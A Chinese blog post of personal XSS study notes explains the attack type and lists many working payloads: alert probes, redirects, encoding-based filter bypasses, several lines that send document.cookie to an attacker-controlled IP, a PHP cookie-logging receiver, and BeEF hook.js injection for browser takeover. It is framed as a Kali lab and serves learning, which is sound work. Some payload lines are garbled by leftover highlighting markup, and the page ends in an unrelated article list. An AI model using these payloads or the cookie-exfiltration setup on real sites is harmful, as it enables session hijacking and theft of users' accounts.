魔法龙

XSS学习笔记--longge

1.xss简介

	XSS跨站脚本攻击(Cross Site Scripting),是将Java script代码插入web页面中，之后当用户浏览页面时, 会执行嵌套在web页面里面的Java script代码,从而达到攻击用户的目的。为了跟HTML里面的层叠样式表(CSS ,Cascading Style Sheets)作区分，所以叫作XSS.

最简单的xss脚本攻击

<script>alert( 'Hello, world!' )</script>

XSS攻击的危害包括：
盗取各类用户账号，如机器登录账号、用户网银账号、各类管理员账号
控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力
盗窃企业重要的具有商业价值的资料
非法转账
强制发送电子邮件
网站挂马
控制受害者机器向其他网站发起攻击

2.原理解析

3.构造XSS脚本

3.1 HTML标签

    		iframe元素会创建包含另外一个文档的内联框架<span class="token punctuation">(</span>即行内框架<span class="token punctuation">)</span>。

<textarea>			<textarea>标签定义多行的文本输入控件

<img>				img 元素向网页中嵌入一幅图像

<script>			<script>标签用于定义客户端脚本<span class="token punctuation">,</span>比如 Javascript
					script 元素既可以包含脚本语句<span class="token punctuation">,</span>也可以通过 src 属性指向外部本文件。
					必需的 <span class="token function">type</span> 属性规定脚本的 NINE 类型。
					javascript 的常见应用时图像操作、表单验证以及动态内容更新
</code></pre> 
  <ul> 
   <li>3.2 常用JavaScript方法</li> 
  </ul> 
  <pre><code class="prism language-powershell">alert				alert<span class="token punctuation">(</span><span class="token punctuation">)</span>方法用于显示带有一条指定消息和个确认按钮的警告框
window<span class="token punctuation">.</span> location	window<span class="token punctuation">.</span> location对象用于获得当前页面的地址<span class="token punctuation">(</span>URL<span class="token punctuation">)</span><span class="token punctuation">,</span>井把浏览器重定向到新的页面。
location<span class="token punctuation">.</span>href		location<span class="token punctuation">.</span>href返回当前显示的文档的完整URL
onload				一张页面或一幅图像完成加载
onsubmit			确认按钮被点击
onerror				在加载文档或图像时发生错误
</code></pre> 
  <ul> 
   <li>3.3构造xss脚本</li> 
  </ul> 
  <pre><code class="prism language-powershell">弹框警告
此脚本实现弹框提示<span class="token punctuation">,</span>一般作为漏洞测试或者演示使用<span class="token punctuation">,</span>类似SQL注入漏洞试中的单引号<span class="token string">',一旦此脚本能执行,也就意
味着后端服务器没有对特殊字符做过滤<>/'</span>	这样就可以证明<span class="token punctuation">,</span>这个页面位置存在了XS漏洞。
<script>alert<span class="token punctuation">(</span>xss<span class="token punctuation">)</span><<span class="token operator">/</span>script>
<script>alert<span class="token punctuation">(</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span><<span class="token operator">/</span>script>

页面嵌套
<iframe src=http:<span class="token operator">/</span><span class="token operator">/</span>www<span class="token punctuation">.</span>baidu<span class="token punctuation">.</span>com width=300 height<span class="token operator">-</span>300><<span class="token operator">/</span>iframe>
<iframe src=http:<span class="token operator">/</span><span class="token operator">/</span>www<span class="token punctuation">.</span>baidu<span class="token punctuation">.</span>com width=0 height=0 border=0><<span class="token operator">/</span>iframe>

页面重定向
<script>window<span class="token punctuation">.</span>location=<span class="token string">"http://www.baidu.com"</span><<span class="token operator">/</span>script>
<script>location<span class="token punctuation">.</span>href=<span class="token string">"http://www.baidu.com"</span><<span class="token operator">/</span>script>

弹框警告并重定向
<script>alert<span class="token punctuation">(</span><span class="token string">"请移步到我们的新站"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>location<span class="token punctuation">.</span>href=<span class="token string">"http://www.baidu.com"</span><<span class="token operator">/</span>script>
<script>alert<span class="token punctuation">(</span>xss<span class="token punctuation">)</span><span class="token punctuation">;</span>location<span class="token punctuation">.</span>href=http:<span class="token operator">/</span><span class="token operator">/</span>x<span class="token punctuation">.</span>x<span class="token punctuation">.</span>x<span class="token punctuation">.</span>x<span class="token operator">/</span>mutillidae<span class="token operator">/</span>robots<span class="token punctuation">.</span>txt<span class="token string">"</script>
这里结合了一些社工的思路,例如,通过网站内部私信的方式将其发给其他用户。如果其他用户点击井且相信了这个信
息,则可能在另外的站点重新登录账户(克隆网站收集账户)

访冋恶意代码
<script> src="</span>http:<span class="token operator">/</span><span class="token operator">/</span>192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>2<span class="token punctuation">.</span>100<span class="token operator">/</span>xss<span class="token punctuation">.</span>js<span class="token string">"></script>
<script> src="</span>http:<span class="token operator">/</span><span class="token operator">/</span>192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>2<span class="token punctuation">.</span>100:3000<span class="token operator">/</span>hook<span class="token punctuation">.</span>js<span class="token string">"></script>	#结合BeEF收集用户的cookie
<script> scr="</span>http:<span class="token operator">/</span><span class="token operator">/</span>192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>2<span class="token punctuation">.</span>100:3000<span class="token operator">/</span>hook<span class="token punctuation">.</span>js<span class="token string">"></script>
巧用图片标签
<img src="</span><span class="token comment">#" οnerrοr=alert(xss)></span>
<img src=<span class="token string">"javascript:alert(xss);"</span>>
<img src=http:<span class="token operator">/</span><span class="token operator">/</span>192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>2<span class="token punctuation">.</span>100:3000<span class="token operator">/</span>hook<span class="token punctuation">.</span>js<span class="token string">"></img>

绕开过滤的脚本
大小写<ScrIpt>alert('xss')</SCRipt>
字符编码采用URL、Base64等编码
<a href="</span>&<span class="token comment">#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;">longge</a> </span>

收集用户cookie
打开新窗口并且采用本地cookie访问目标网页
<script>window<span class="token punctuation">.</span>open<span class="token punctuation">(</span><span class="token string">"http://192.168.2.100/cookie.php?cookie="</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span><<span class="token operator">/</span>script>
<script>document<span class="token punctuation">.</span>location=<span class="token string">"http://192.168.2.100/cookie.php?cookie="</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<<span class="token operator">/</span>script>
<script>new Image<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>src=<span class="token string">"192.168.2.100/cookie.php?cookie.php?cookie="</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">;</span><<span class="token operator">/</span>script>
<img src=<span class="token string">"http://192.168.2.100/cookie.php?cookie='+document.cookie"</span>><<span class="token operator">/</span>img>
<iframe src=<span class="token string">"http://192.168.2.100/cookie.php?cookie='+document.cookie"</span>><<span class="token operator">/</span>iframe>
<script>new Image<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>src=<span class="token string">"http://192.168.2.100/cookie.php?cookie='+document.cookie"</span><span class="token punctuation">;</span>
img<span class="token punctuation">.</span>width = 0<span class="token punctuation">;</span>
img<span class="token punctuation">.</span>height = 0<span class="token punctuation">;</span>
<<span class="token operator">/</span>script>
</code></pre> 
  <p><strong>4反射型XSS</strong></p> 
  <ul> 
   <li>手工xss<br> 用户访问网页中的XSS链接,服务器接受并返回,用户执行反射回来的代码并解析执行。</li> 
  </ul> 
  <p><strong>5.存储型XSS</strong><br> 存储型XSS(持久型XSS)即攻击者将有XSS攻击的链接放在网页的某个页面,例如评论框等;<br> 用户访问此XSS链接并执行,由于存储型XSS能够攻击所有访可此页面的用户,所以危害非常大。</p> 
  <ul> 
   <li> <p>5.1手工（低）<br> 攻击1 弹框告警:渗透机 kali Linux端操作<br> text1</p> <p>攻击2 获取 cookie:渗透机 Kali Linux端操作<br> 1.构建收集 cookie服务器<br> 2.构造XSS代码并植入到Web服务器<br> 3.等待肉鸡触发XSS代码并将 cookie发送到kali<br> 4. Cookie利用</p> <pre><code> 步骤一：打开kali并启动Apache2服务
 root@kali: w# vim /var/www/html/cookie_rec.php
</code></pre> </li> 
  </ul> 
  <pre><code class="prism language-php"><span class="token delimiter important"><?php</span>
<span class="token variable">$cookie</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'cookie'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$log</span> <span class="token operator">=</span> <span class="token function">fopen</span><span class="token punctuation">(</span><span class="token double-quoted-string string">"cookie.txt"</span><span class="token punctuation">,</span> <span class="token double-quoted-string string">"a"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$log</span><span class="token punctuation">,</span> <span class="token variable">$cookie</span> <span class="token punctuation">.</span><span class="token double-quoted-string string">"\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$log</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
 <span class="token delimiter important">?></span> 
</code></pre> 
  <pre><code>	步骤二：给予相应的权限
	rootekali: chown  -R www-data.www-data  /var/www/
	<script>window.open('http://192.168.2.100/cookie_rec.php?cookie='+document.cookie)</script>
	注:192.168.2.100为Kali Linux IP
	注:先清除之前注入的XSS代码
</code></pre> 
  <p><strong>6.自动化XSS</strong></p> 
  <blockquote> 
   <p>BeEF简介 Browser Exploitation Framework (BeEF)<br> BeEF是目前最强大的浏览器开源渗透测试框架,通过XSS漏洞配合JS脚本和Metasploit进行渗透;<br> BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单; <br> http://beefproject.com/</p> 
  </blockquote> 
  <ol> 
   <li> <p>信息收集:</p> <pre><code>网络发现
主机信息
cookie获取
会话劫持
键盘记录
插件信息
</code></pre> </li> 
   <li> <p>持久化控制:</p> <pre><code>确认弹框
小窗口
中间人
</code></pre> </li> 
   <li> <p>社会工程</p> <pre><code>点击劫持
弹窗告警
虚假页面
钓鱼页面
</code></pre> </li> 
   <li> <p>渗透攻击:</p> <pre><code>内网渗透
Metasploit
CSRF攻击
DDOS攻击
</code></pre> </li> 
  </ol> 
  <ul> 
   <li> <p>BeEF基础</p> <pre><code> 先清除之前注入的XSS代码
 启动Apache和BeEF:
 root@kali:~# systemctl start beef-xss
</code></pre> <p><a href="http://img.e-com-net.com/image/info8/874a2faed3c54c8195e54b0058320a74.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/874a2faed3c54c8195e54b0058320a74.jpg" alt="XSS学习笔记--longge_第1张图片" width="650" height="430" style="border:1px solid black;"></a></p> <p>只用把红框中的信息放入到XSS中即可<br> 进入网页：默认账户密码都是beef，第一次在打开的时候要先设置密码，默认账户是beef<br> 修改密码路径<br> root@kali:~# vi /etc/beef-xss/config.yaml<br> <a href="http://img.e-com-net.com/image/info8/3671cbd9d26c4eb59aa08dd8d8336f10.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/3671cbd9d26c4eb59aa08dd8d8336f10.jpg" alt="XSS学习笔记--longge_第2张图片" width="650" height="299" style="border:1px solid black;"></a><br> 输入账户密码进入到主页面：<br> <a href="http://img.e-com-net.com/image/info8/c77fba678154431e8144ae7973f52f94.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c77fba678154431e8144ae7973f52f94.jpg" alt="XSS学习笔记--longge_第3张图片" width="650" height="330" style="border:1px solid black;"></a></p> </li> 
  </ul> 
  <p>在XSS端输入：</p> 
  <pre><code class="prism language-bash"><span class="token operator"><</span>script src<span class="token operator">=</span><span class="token string">"http://192.168.2.100:3000/hook.js"</span><span class="token operator">></span><span class="token operator"><</span>/script<span class="token operator">></span>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/7be5f733ff594f07929abe84fb561ace.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/7be5f733ff594f07929abe84fb561ace.jpg" alt="XSS学习笔记--longge_第4张图片" width="650" height="316" style="border:1px solid black;"></a><a href="http://img.e-com-net.com/image/info8/cf19ce7839a14f179796a055099c856a.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/cf19ce7839a14f179796a055099c856a.jpg" alt="XSS学习笔记--longge_第5张图片" width="650" height="327" style="border:1px solid black;"></a></p> 
  <p>保存之后，beef端就收集到数据了<br> 命令颜色（color）：<br> 绿色：对目标主机生效并且不可见（不会被发现）<br> 橙色：对目标主机生效但可能可见（可能被发现）<br> 灰色：对目标主机未必生效（可验证下）<br> 红色：对目标主机不生效<br> 在这里插入图片描述<br> 进而使用命令对网站进行攻击。</p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1291778077893926912"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(XSS学习笔记--longge)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1950196906563006464.htm"
                           title="Unity学习笔记1" target="_blank">Unity学习笔记1</a>
                        <span class="text-muted">zy_777</span>

                        <div>通过一个星期的简单学习，初步了解了下unity，unity的使用，以及场景的布局，UI，以及用C#做一些简单的逻辑。好记性不如烂笔头，一些关键帧还是记起来比较好，哈哈，不然可能转瞬即逝了，（PS:纯小白观点，unity大神可以直接忽略了）一：MonoBehaviour类的初始化1，Instantiate()创建GameObject2，通过Awake()和Start()来做初始化3，Update、L</div>
                    </li>
                    <li><a href="/article/1950187554129113088.htm"
                           title="Django学习笔记（一）" target="_blank">Django学习笔记（一）</a>
                        <span class="text-muted"></span>

                        <div>学习视频为：pythondjangoweb框架开发入门全套视频教程一、安装pipinstalldjango==****检查是否安装成功django.get_version()二、django新建项目操作1、新建一个项目django-adminstartprojectproject_name2、新建APPcdproject_namedjango-adminstartappApp注：一个project</div>
                    </li>
                    <li><a href="/article/1950179614320029696.htm"
                           title="python学习笔记（汇总）" target="_blank">python学习笔记（汇总）</a>
                        <span class="text-muted">朕的剑还未配妥</span>
<a class="tag" taget="_blank" href="/search/python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E6%95%B4%E7%90%86/1.htm">python学习笔记整理</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>文章目录一.基础知识二.python中的数据类型三.运算符四.程序的控制结构五.列表六.字典七.元组八.集合九.字符串十.函数十一.解决bug一.基础知识print函数字符串要加引号，数字可不加引号，如print(123.4)print('小谢')print("洛天依")还可输入表达式，如print(1+3)如果使用三引号，print打印的内容可不在同一行print("line1line2line</div>
                    </li>
                    <li><a href="/article/1950147339964444672.htm"
                           title="【Druid】学习笔记" target="_blank">【Druid】学习笔记</a>
                        <span class="text-muted">fixAllenSun</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a>
                        <div>【Druid】学习笔记【一】简介【1】简介【2】数据库连接池（1）能解决的问题（2）使用数据库连接池的好处【3】监控（1）监控信息采集的StatFilter（2）监控不影响性能（3）SQL参数化合并监控（4）执行次数、返回行数、更新行数和并发监控（5）慢查监控（6）Exception监控（7）区间分布（8）内置监控DEMO【4】Druid基本配置参数介绍【5】Druid相比于其他数据库连接池的优点</div>
                    </li>
                    <li><a href="/article/1950144189979226112.htm"
                           title="Spring Security OAuth2.0在分布式系统中的安全实践" target="_blank">Spring Security OAuth2.0在分布式系统中的安全实践</a>
                        <span class="text-muted"></span>

                        <div>引言分布式系统架构下，安全认证与授权面临跨服务、高并发、多租户等挑战。SpringSecurity与OAuth2.0的结合为微服务安全提供了标准化解决方案。分布式系统中的安全挑战跨服务身份认证的复杂性令牌管理的可扩展性问题多租户场景下的权限隔离需求防止CSRF、XSS等常见攻击SpringSecurityOAuth2.0核心架构授权服务器设计@EnableAuthorizationServer配置</div>
                    </li>
                    <li><a href="/article/1950142042847899648.htm"
                           title="java学习笔记8" target="_blank">java学习笔记8</a>
                        <span class="text-muted">幸福，你等等我</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>一、异常处理Error：错误，程序员无法处理，如OOM内存溢出错误、内存泄漏...会导出程序崩溃1.异常：程序中一些程序自身处理不了的特殊情况2.异常类Exception3.异常的分类:（1）.检查型异常(编译异常):在编译时就会抛出的异常(代码上会报错),需要在代码中编写处理方式(和程序之外的资源访问)直接继承Exception（2）.运行时异常:在代码运行阶段可能会出现的异常,可以不用明文处理</div>
                    </li>
                    <li><a href="/article/1950127164250714112.htm"
                           title="ubuntu的redis反弹shell总结" target="_blank">ubuntu的redis反弹shell总结</a>
                        <span class="text-muted">chanra</span>
<a class="tag" taget="_blank" href="/search/%E8%90%8C%E6%96%B0%E9%9A%8F%E7%AC%94/1.htm">萌新随笔</a><a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a><a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                        <div>ubuntu的redis反弹shell总结ubuntu要执行有三点：1、ubuntu的默认执行命令的为/bin/dash，我们使用bash-i肯定是弹不了的。2、ubuntu计划任务运行有语法要求，redis写入的文件存在缓存数据，导致语法错误无法运行计划任务。3、文件需要是600rw权限，权限不对也不能运行，不过我直接写入貌似就是600rw。参考链接：http://www.vkxss.top/2</div>
                    </li>
                    <li><a href="/article/1950113424281235456.htm"
                           title="2025 最强 Agent 智能体 学习笔记 (71)" target="_blank">2025 最强 Agent 智能体 学习笔记 (71)</a>
                        <span class="text-muted">一刀7段</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>Agent智能体的系统学习与职业发展核心内容概览本集是《2025最强Agent智能体全套教程》的第72集，聚焦Agent智能体领域的系统学习方法与职业发展路径，系统梳理了从入门到专家的能力体系、关键学习资源、职业方向选择及行业发展机遇。内容结合技术趋势与职场需求，为不同背景的学习者（学生、开发者、转行人士）提供清晰的成长蓝图，帮助其在Agent智能体领域高效成长，实现职业目标。系统学习的能力体系与</div>
                    </li>
                    <li><a href="/article/1950095708468080640.htm"
                           title="【学习笔记】CBT工作坊第二天：动机驱动行为" target="_blank">【学习笔记】CBT工作坊第二天：动机驱动行为</a>
                        <span class="text-muted">花团与芥末</span>

                        <div>什么叫动机?在认知行为疗法中，动机是引导我们行为的各种外在和内在的力量，唤起行为起始的力量，朝着一定目标与方向进行的力量，维持或停止的力量。也就是说，在我们的所有行为包括没有做的行为背后，都隐藏着某种动机。那么，动机一般有哪些呢?大家一般听说过的，是马斯洛的需求层次理论。在他的金字塔理论中，将动机需求分为了6个层次，从初级到高级分别是：生存(活着的必须条件)--安全(活下去)--爱--尊重--自我</div>
                    </li>
                    <li><a href="/article/1950082037897555968.htm"
                           title="图解系统的学习笔记--硬件结构" target="_blank">图解系统的学习笔记--硬件结构</a>
                        <span class="text-muted">什么蜜桃绵绵冰</span>
<a class="tag" taget="_blank" href="/search/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/1.htm">操作系统</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>CPU是如何执行程序的？图灵机的工作方式图灵机的基本组成纸带：纸带由一个个连续的格子组成，每个格子可以写入字符，纸带就好比内存，而纸带上的格子的字符就好比内存中的数据或程序读写头：可以读取只带上任意格子的字符，也可以把字符写入到纸带的格子读写头上的部件-存储单元、控制单元、运算单元存储单元用于存放数据控制单元用于识别字符是数据还是指令、以及控制程序的流程等预算单元用于执行运算指令冯诺依曼模型计算机</div>
                    </li>
                    <li><a href="/article/1950061236175564800.htm"
                           title="Spring学习笔记07——SpringBoot中关于接口文档管理的注解" target="_blank">Spring学习笔记07——SpringBoot中关于接口文档管理的注解</a>
                        <span class="text-muted">Shaoxi Zhang</span>
<a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>一、Lombok注解@Data：生成所有字段的getter/setter、toString()、equals()和hashCode()。@Getter/@Setter：单独为所有字段或指定字段生成getter/setter。importlombok.Data;@DatapublicclassUser{privateLongid;privateStringname;}编译后，Lombok会为id和n</div>
                    </li>
                    <li><a href="/article/1950057579757498368.htm"
                           title="零基础入门uniapp Vue3组合式API版本" target="_blank">零基础入门uniapp Vue3组合式API版本</a>
                        <span class="text-muted">鹤早早</span>
<a class="tag" taget="_blank" href="/search/uni-app/1.htm">uni-app</a>
                        <div>前言：小程序学习笔记，课程来源up主咸虾米_。仅记录笔记，大家想学习可以去关注他。1.已安装HBuiderX（目前是4.36版本），微信开发者工具（但还没注册小程序码），相关配置OK了。1.16相关架构学习1.pages-index-index.vuebox1box2.layout{border:1pxsolidred;.box1{border:1pxsolidgreen;}.box2{borde</div>
                    </li>
                    <li><a href="/article/1950053795572543488.htm"
                           title="JavaWeb（苍穹外卖）--学习笔记14" target="_blank">JavaWeb（苍穹外卖）--学习笔记14</a>
                        <span class="text-muted">哈哈哈哈哈0627</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>前言终于开始学习做项目了，本篇文章是学习B站黑马程序员苍穹外卖的学习笔记。我的学习路线是Java基础语法-JavaWeb-做项目，管理端的功能学习完之后，就进入到了用户端微信小程序的开发，这篇文章是把我觉得JavaWeb的学习中比较重要的内容写一个总结（其实因为学到下单支付太难了我复习复习前面的）Controller层（这里只讲讲几个需要注意的注解）管理服务端的动态资源：SpringFramewo</div>
                    </li>
                    <li><a href="/article/1950050264991985664.htm"
                           title="Langchain学习笔记(十)：文档加载与处理详解" target="_blank">Langchain学习笔记(十)：文档加载与处理详解</a>
                        <span class="text-muted"></span>

                        <div>注：本文是Langchain框架的学习笔记；不是教程！不是教程！内容可能有所疏漏，欢迎交流指正。后续将持续更新学习笔记，分享我的学习心得和实践经验。前言在构建基于大语言模型的应用时，文档处理是一个至关重要的环节。无论是构建RAG（检索增强生成）系统，还是进行知识库问答，我们都需要将各种格式的文档转换为模型可以理解和处理的形式。Langchain提供了强大的文档加载和处理功能，支持多种文件格式，并提</div>
                    </li>
                    <li><a href="/article/1950050265457553408.htm"
                           title="Langchain学习笔记(十二)：Memory机制与对话管理" target="_blank">Langchain学习笔记(十二)：Memory机制与对话管理</a>
                        <span class="text-muted">zhangsan0933</span>
<a class="tag" taget="_blank" href="/search/LangChain/1.htm">LangChain</a><a class="tag" taget="_blank" href="/search/langchain/1.htm">langchain</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>注：本文是Langchain框架的学习笔记；不是教程！不是教程！内容可能有所疏漏，欢迎交流指正。后续将持续更新学习笔记，分享我的学习心得和实践经验。前言在构建智能对话系统时，记忆功能是至关重要的。想象一下，如果每次与AI对话都像第一次见面一样，无法记住之前的交流内容，这样的体验将是多么糟糕。LangChain的Memory机制正是为了解决这个问题而设计的，它让AI能够"记住"对话历史，从而提供更加</div>
                    </li>
                    <li><a href="/article/1950004979813117952.htm"
                           title="OkHttp学习笔记5--Events" target="_blank">OkHttp学习笔记5--Events</a>
                        <span class="text-muted">雪晨杰</span>

                        <div>EventsEventsallowyoutocapturemetricsonyourapplication’sHTTPcalls.Useeventstomonitor:事件允许您捕获应用程序HTTP调用的度量。使用事件来监控:ThesizeandfrequencyoftheHTTPcallsyourapplicationmakes.Ifyou’remakingtoomanycalls,oryour</div>
                    </li>
                    <li><a href="/article/1949998940879384576.htm"
                           title="CTF-Web学习笔记：SQL注入篇" target="_blank">CTF-Web学习笔记：SQL注入篇</a>
                        <span class="text-muted">编程到天明</span>
<a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>目录引言一、SQL注入的基础概念1.什么是SQL注入？2.SQL注入的成因二、CTF中常见的SQL注入类型1.按参数类型分类2.按注入方式分类3.其他进阶类型三、CTF实战技巧：从找注入点到拿Flag1.如何判断是否存在注入？2.快速确定数据库类型3.常用工具辅助4.绕过WAF（Web应用防火墙）四、CTF题目示例：一道报错注入实战题目背景解题步骤五、总结与提升引言在CTF（CaptureTheF</div>
                    </li>
                    <li><a href="/article/1949951660868562944.htm"
                           title="Linux驱动开发学习笔记-设备树" target="_blank">Linux驱动开发学习笔记-设备树</a>
                        <span class="text-muted"></span>

                        <div>1、设备树1)将描述板级硬件信息的内容都从Linux内中分离开来，用一个专属的文件格式来描述，这个专属的文件就叫做设备树，文件扩展名为.dts。一个SOC可以作出很多不同的板子，这些不同的板子肯定是有共同的信息，将这些共同的信息提取出来作为一个通用的文件，其他的.dts文件直接引用这个通用文件即可，这个通用文件就是.dtsi文件，类似于C语言中的头文件。.dts描述板级信息(也就是开发板上有哪些I</div>
                    </li>
                    <li><a href="/article/1949871962146795520.htm"
                           title="进阶向:基于Python的本地文件内容搜索工具" target="_blank">进阶向:基于Python的本地文件内容搜索工具</a>
                        <span class="text-muted">超级小识</span>
<a class="tag" taget="_blank" href="/search/Python%E8%BF%9B%E9%98%B6/1.htm">Python进阶</a><a class="tag" taget="_blank" href="/search/%E6%9C%89%E8%B6%A3%E7%9A%84%E9%A1%B9%E7%9B%AE/1.htm">有趣的项目</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>概述大家好！今天我们将一起学习如何用Python创建一个简单但强大的本地文件内容搜索工具。这个工具特别适合处理大量文本文件时的快速检索需求。为什么要学习这个工具如果你刚接触编程，完全不用担心！我会从零开始讲解，确保每一步都清晰易懂。想象一下这个常见场景：你有一个装满各种文档的文件夹（可能是工作文档、学习笔记或项目文件），现在想快速找到所有包含"重要笔记"或"项目需求"等关键字的文件。手动逐个打开文</div>
                    </li>
                    <li><a href="/article/1949862622660718592.htm"
                           title="Freertos学习笔记（一）-----FreeRTOS基本知识" target="_blank">Freertos学习笔记（一）-----FreeRTOS基本知识</a>
                        <span class="text-muted">努力搬砖的扁鱼</span>
<a class="tag" taget="_blank" href="/search/%E5%B5%8C%E5%85%A5%E5%BC%8F%E5%BC%80%E5%8F%91/1.htm">嵌入式开发</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>RTOS“realtime”（实时）指的是系统对外部事件能够在规定的、可预测的时间内作出响应。具体含义如下：确定性（Determinism）：FreeRTOS强调事件响应的可预测性。无论系统有多少任务，关键操作（比如任务切换、中断处理）都能在已知的最坏情况下完成。这意味着开发者可以预估任务的最大响应延迟。任务优先级与抢占：FreeRTOS支持任务优先级和抢占调度。高优先级任务可以在更低优先级任务运</div>
                    </li>
                    <li><a href="/article/1949837529918271488.htm"
                           title="# Linux学习笔记 - 4" target="_blank"># Linux学习笔记 - 4</a>
                        <span class="text-muted">Norvyn_7</span>
<a class="tag" taget="_blank" href="/search/Linux%E5%AD%A6%E4%B9%A0/1.htm">Linux学习</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>Linux学习笔记-4本篇将介绍Linux中root用户管理、用户与用户组操作、权限控制信息以及chmod/chown命令的使用。1.root用户（超级管理员）root用户拥有最大的系统操作权限，可执行所有操作。1.1su和exitsu命令：切换用户语法：su[-][用户名]-表示切换后加载目标用户的环境变量（建议添加）。不加用户名时默认切换到root用户。示例：su-root#切换到root用户</div>
                    </li>
                    <li><a href="/article/1949831735789285376.htm"
